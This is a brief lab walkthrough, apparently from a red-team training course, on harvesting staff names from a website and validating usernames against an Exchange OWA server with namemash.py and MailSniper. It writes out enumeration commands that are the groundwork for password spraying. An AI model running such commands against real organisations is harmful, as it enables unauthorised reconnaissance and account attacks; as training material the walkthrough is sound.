Now let’s enumerate the target usernames.

<https://cyberbotic.io/our-team/>

image.png

now we got some usernames.

Bob Farmer
Isabel Yates
John King
Joyce Adams

Now let’s make combinations.

python3 namemash.py names.txt > comb.txt

image.png

Now let’s import the MailSniper Script

Import-Module .\\MailSniper.ps1

image.png

Enumerating the netbios name for the domain

Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.io

image.png

Now let’s validate the usernames on the exchange server.

Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -UserList possible.txt -OutFile valid.txt

image.png

Now let’s see the valid usernames.

type .\\valid.txt

image.png